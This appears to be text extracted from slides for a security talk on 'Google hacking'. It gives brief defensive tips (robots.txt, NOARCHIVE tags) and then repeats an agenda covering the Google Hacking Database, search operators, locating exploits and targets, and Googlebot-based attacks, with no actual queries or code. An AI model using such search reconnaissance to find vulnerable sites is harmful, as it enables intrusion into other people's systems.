Perform periodic Google Assessments – Update robots.txt – Use meta-tags: NOARCHIVE – http://www.google.com/remove.html
Work with Google for help in removing security breaches. They are easy to work with and want to help! You can find contact info on their site
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
If someone is still in the room.. Q & A!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
THANK YOU